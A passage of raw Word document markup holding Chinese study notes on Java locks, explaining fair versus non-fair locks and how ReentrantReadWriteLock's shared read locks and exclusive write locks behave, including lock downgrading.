        <w:t>Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00D46067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分为“公平锁”和“非公平锁”，</w:t>
      </w:r>
      <w:r w:rsidRPr="004952EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>公平锁表示线程获取锁的顺序是按照线程加锁的顺序来分配的，即</w:t>
      </w:r>
      <w:r w:rsidRPr="004952EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>FIFO</w:t>
      </w:r>
      <w:r w:rsidRPr="001F775C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7951">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非公平锁</w:t>
      </w:r>
      <w:r w:rsidRPr="001F775C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一种获取锁的抢占机制，是随机获得锁的，和公平锁不一样的就是先来的不一定先得到锁，这个方式可能造成某些线程一直拿不到锁，结果也就是不公平的了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D30DD4" w:rsidRPr="00D30DD4" w:rsidRDefault="00D30DD4" w:rsidP="00B0297D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="825"/>
        </w:tabs>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E20F8" w:rsidRPr="00F41A4C" w:rsidRDefault="008E20F8" w:rsidP="008E20F8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReentrantReadWriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A41A5F" w:rsidRDefault="00A41A5F" w:rsidP="00A41A5F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="125" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="420" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A41A5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>说到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A41A5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReentrantReadWriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00A41A5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>，首先要做的是与</w:t>
      </w:r>
      <w:r w:rsidRPr="00A41A5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00A41A5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>划清界限。它</w:t>
      </w:r>
      <w:r w:rsidRPr="00A41A5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>和后者都是单独的实现，彼此之间没有继承或实现的关系</w:t>
      </w:r>
      <w:r w:rsidRPr="00A41A5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E20F8" w:rsidRPr="008E20F8" w:rsidRDefault="008E20F8" w:rsidP="008E20F8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="125" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="420" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>具有完全互斥排他的效果，即同一时间只有一个线程在执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReentrantLock.lock()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>方法后面的任务。虽然保证了实例变量的线程安全性，但效率是非常低的，所以引入了读写锁</w:t>
      </w:r>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReentranReadWriteLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。用它可以加快运行效率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E20F8" w:rsidRPr="008E20F8" w:rsidRDefault="008E20F8" w:rsidP="008E20F8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="125" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="420" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>读写锁</w:t>
      </w:r>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReentranReadWriteLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>分为两种：读相关的锁</w:t>
      </w:r>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B32965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>读锁、</w:t>
      </w:r>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>共享锁</w:t>
      </w:r>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>，写相关的锁</w:t>
      </w:r>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B32965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>写锁、</w:t>
      </w:r>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>排他锁</w:t>
      </w:r>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="008E20F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>多个读锁之间不互斥，写锁与读锁互斥，写锁与写锁互斥。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C5F83" w:rsidRDefault="00C40BE3" w:rsidP="00C40BE3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2830830" cy="1280160"/>
            <wp:effectExtent l="19050" t="0" r="7620" b="0"/>
            <wp:docPr id="26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7" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2830830" cy="1280160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1ADE" w:rsidRDefault="009F1ADE" w:rsidP="009F1ADE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReadWriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不是</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的子接口，只不过</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReadWriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>借助</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现读写两个视角。在</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReadWriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中每次读取共享数据就需要读取锁，当需要修改共享数据时就需要写入锁。看起来好像是两个锁，但其实不尽然，下文会指出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1ADE" w:rsidRDefault="009F1ADE" w:rsidP="009F1ADE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReentrantReadWriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以推广到</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>大部分读，少量写的场景</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为读线程之间没有竞争，所以比起</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sychronzied</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，性能好很多。如果需要较为精确的控制缓存，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReentrantReadWriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1ADE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>倒也不失为一个方案</w:t>
      </w:r>
      <w:r w:rsidR="003A03E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E6670F" w:rsidRPr="00E6670F" w:rsidRDefault="00E6670F" w:rsidP="00E6670F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(a).</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重入方面其内部的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReadLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是反过来</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReadLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>想要获得</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则永远都不要想。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E6670F" w:rsidRPr="00E6670F" w:rsidRDefault="00E6670F" w:rsidP="00E6670F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(b).WriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以降级为</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReadLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，顺序是：先获得</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再获得</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReadLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后释放</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
